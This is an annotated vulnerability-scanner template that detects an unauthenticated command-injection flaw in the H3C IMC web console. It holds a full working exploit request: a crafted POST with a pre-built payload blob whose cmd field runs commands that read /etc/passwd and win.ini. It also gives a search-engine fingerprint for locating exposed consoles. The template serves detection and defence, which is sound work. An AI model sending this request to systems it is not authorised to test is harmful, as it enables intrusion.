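# Detection template: checks whether an H3C IMC web console will run an
# operating-system command for an unauthenticated caller.
# Nesting below is restored from the template schema; the page had lost all
# indentation and had per-line blame timestamps interleaved with the keys.
id: h3c-imc-rce

info:
  name: H3c IMC - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: H3c IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.
  reference:
    - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
  classification:
    # Vector reads: network-reachable, low complexity, no privileges, no user
    # interaction, scope changed, full C/I/A impact - hence the maximum score.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    # CWE-77: command injection.
    cwe-id: CWE-77
  metadata:
    # Upper bound on requests per target: one per entry in the two-item
    # command payload list of the http section.
    max-request: 2
    # Search-engine fingerprint for the IMC login page; the same string can be
    # used to inventory exposed IMC consoles in your own address space.
    fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
  tags: rce,h3c-imc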
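# Request section. Nesting is restored from the template schema, and the
# "Header : value" spacing left by the page extraction is normalised to
# "Header: value", since whitespace before the colon is not a valid HTTP
# header form.
#
# Detection note for defenders: the probe is a POST to
# /imc/javax.faces.resource/dynamiccontent.properties.xhtml whose form body
# carries both a `pfdrid=` and a `cmd=` parameter. That combination in web or
# proxy logs is worth alerting on for IMC hosts.
http:
  - raw:
      # `pfdrid` is an opaque pre-built blob, reproduced verbatim; only `cmd`
      # varies, filled from the payload list below. The empty line separates
      # the HTTP headers from the form body.
      - |
        POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}}

    # One read-only command per platform. Both are single-quoted, so the
    # doubled backslashes in the Windows path are sent literally.
    payloads:
      command:
        - 'cat /etc/passwd'
        - 'type C:\\Windows\\win.ini'

    # Stop sending payloads to a host once one of them has matched.
    stop-at-first-match: true

    # Both matchers must hold: recognisable command output AND HTTP 200.
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          # Root entry of a passwd file (Unix output).
          - "root:.*:0:0:"
          # win.ini section header: [fonts], [extensions] or [files].
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# NOTE(review): the digest below was issued for the template as originally
# published. Presumably any edit to this file, added comments included, stops
# it verifying - re-sign before relying on signature checks.
# digest: 4b0a00483046022100c00dfd9c0968687fa2510be29d9144f9a5ac728873a8cc3ca29c93c015459e55022100d66267fbd6eb24e0ad42deb0599b697935d08bcfa19407243922264477eccc61:922c64590222798bb761d5b6d8e72950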